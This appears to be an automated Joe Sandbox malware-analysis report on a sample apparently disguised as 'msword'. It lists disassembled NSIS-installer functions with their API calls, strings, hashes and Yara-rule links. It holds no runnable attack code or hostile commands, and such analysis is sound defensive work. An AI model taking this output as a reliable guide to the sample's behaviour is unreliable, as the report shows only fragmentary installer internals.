Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
String ID: @rD
API String ID: 3906175533-3814967855
Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
CreateDirectory: "%s" (%d), xrefs: 004017BF
Aborting: "%s", xrefs: 0040161D
BringToFront, xrefs: 004016BD
Rename on reboot: %s, xrefs: 00401943
CreateDirectory: "%s" created, xrefs: 00401849
Sleep(%d), xrefs: 0040169D
SetFileAttributes failed., xrefs: 004017A1
detailprint: %s, xrefs: 00401679
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
SetFileAttributes: "%s":%08X, xrefs: 0040177B
Rename failed: %s, xrefs: 0040194B
Rename: %s, xrefs: 004018F8
Call: %d, xrefs: 0040165A
Jump: %d, xrefs: 00401602

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
RegisterClassW.USER32(0046AD60), ref: 00405B0A
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B

Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30

ShowWindow.USER32(00000005,00000000), ref: 00405B91
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
RegisterClassW.USER32(0046AD60), ref: 00405BD3
DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2

Strings

@%F, xrefs: 004059F6
.DEFAULT\Control Panel\International, xrefs: 00405999
_Nb, xrefs: 00405AD1
.exe, xrefs: 00405A3D
RichEdit20A, xrefs: 00405BB6, 00405BBB
Control Panel\Desktop\ResourceLocale, xrefs: 00405972
B%F, xrefs: 00405A1F
@rD, xrefs: 00405965
RichEd20, xrefs: 00405B9D
RichEd32, xrefs: 00405BA8
RichEdit, xrefs: 00405BC4

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-1650083594
Opcode ID: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
Opcode Fuzzy Hash: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

lstrcatW.KERNEL32(00000000,00000000,WarsFeltMadridFarmsPee,004CB0B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,WarsFeltMadridFarmsPee,WarsFeltMadridFarmsPee,00000000,00000000,WarsFeltMadridFarmsPee,004CB0B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Strings

File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: error, user abort, xrefs: 00401B53
File: wrote %d to "%s", xrefs: 00401BD0
File: error, user cancel, xrefs: 00401B93
File: error creating "%s", xrefs: 00401AF0
WarsFeltMadridFarmsPee, xrefs: 00401A53, 00401A5C, 00401A69, 00401A7B, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: error, user retry, xrefs: 00401B40

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$WarsFeltMadridFarmsPee
API String ID: 4286501637-4051260161
Opcode ID: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
Opcode Fuzzy Hash: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403598
GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600

Strings

Inst, xrefs: 0040366C
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
soft, xrefs: 00403675
Error launching installer, xrefs: 004035D7
Null, xrefs: 0040367E

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033E7
GetTickCount.KERNEL32 ref: 00403464
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
wsprintfW.USER32 ref: 004034A4
WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A

Strings

P1B, xrefs: 004033A9
... %d%%, xrefs: 0040349E
X1C, xrefs: 004033ED
X1C, xrefs: 0040343C

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$P1B$X1C$X1C
API String ID: 651206458-1535804072
Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
Opcode Fuzzy Hash: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GlobalFree.KERNELBASE(00722D98), ref: 00402387

Strings

WarsFeltMadridFarmsPee, xrefs: 00401EFB, 00401F00, 00401F1A
Pop: stack empty, xrefs: 00401F2C
Exch: stack < %d elements, xrefs: 00401ED8

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: Exch: stack < %d elements$Pop: stack empty$WarsFeltMadridFarmsPee
API String ID: 1459762280-1231270740
Opcode ID: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
Opcode Fuzzy Hash: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

GlobalFree.KERNELBASE(00722D98), ref: 00402387

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
